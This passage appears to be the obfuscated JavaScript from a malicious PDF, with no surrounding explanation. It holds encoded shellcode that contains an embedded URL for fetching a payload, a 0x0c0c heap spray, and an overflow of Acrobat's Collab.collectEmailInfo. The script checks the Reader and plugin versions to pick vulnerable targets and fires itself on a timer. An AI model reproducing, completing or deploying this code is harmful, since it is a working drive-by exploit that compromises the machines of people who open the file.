e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7470%u6f6e%u0066%u7468%u7074%u2f3a%u6c2f%u6565%u676a%u632e%u6d6f%u632f%u6967%u622d%u6e69%u632f%u696c%u6b63%u2f33%u306e%u3230%u3031%u3236%u3130%u3072%u3034%u5839%u3439%u6330%u3333%u6637%u3559%u6631%u3462%u3731%u5a66%u3130%u3030%u3066%u3037";app.c__F_8r = unescape(S32Wq4_fqHo(l_U5n_klb0o, e_K5_byI6ayEf));var QEvD3_o27_1G1_8 = 0x400000;var F_jr_w = R51MAa0U.length * 2;var Ady21v32oC = QEvD3_o27_1G1_8 - (F_jr_w+0x38);PXP6ojo_OBVgAi = c6__PjlP4(PXP6ojo_OBVgAi, Ady21v32oC);var MOCf_ni_K6_NXb = (H0_m__prbtc - 0x400000)/QEvD3_o27_1G1_8;for (var nuP_ao37ho = 0; nuP_ao37ho < MOCf_ni_K6_NXb; nuP_ao37ho++) {PIrhike_8_bR10[nuP_ao37ho] = PXP6ojo_OBVgAi + R51MAa0U;}}function mMMHL8A2cPy(){var v_J563 = "";for (GjVPRb607XJ = 0; GjVPRb607XJ < 12; GjVPRb607XJ++) {v_J563 += unescape("%u0c0c%u0c0c");}var a211My_N__CE75 = "";for (GjVPRb607XJ = 0; GjVPRb607XJ < 750; GjVPRb607XJ++) {a211My_N__CE75 += v_J563;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: a211My_N__CE75});app.clearTimeOut(EO__M_pEF__N);}function uE37AtCJ_G4q(SVI__qG8_d){var Le_sD3 = EO__M_pEF__N;if ((SVI__qG8_d >= 8 && SVI__qG8_d < 8.11) || SVI__qG8_d < 7.1) {Euft1O8YgbW(23, "%u0c0c%u0c0c", SVI__qG8_d);mMMHL8A2cPy();}if (Le_sD3) {app.clearTimeOut(Le_sD3);}}var agq_o5Gj4_ma = 0;var Q4_6TR_OvB_KJ_w = app.plugIns;for (var IG_68476cWHPxd = 0; IG_68476cWHPxd < Q4_6TR_OvB_KJ_w.length; IG_68476cWHPxd++) {var I___7F4d = Q4_6TR_OvB_KJ_w[IG_68476cWHPxd].version;if (I___7F4d > agq_o5Gj4_ma) { agq_o5Gj4_ma = I___7F4d; }}if (app.viewerVersion == 9.103 && agq_o5Gj4_ma < 9.13) {agq_o5Gj4_ma = 9.13;}app.YP_f_1 = uE37AtCJ_G4q;EO__M_pEF__N = app.setTimeOut("app.YP_f_1(" + agq_o5Gj4_ma.toString() + ")", 50);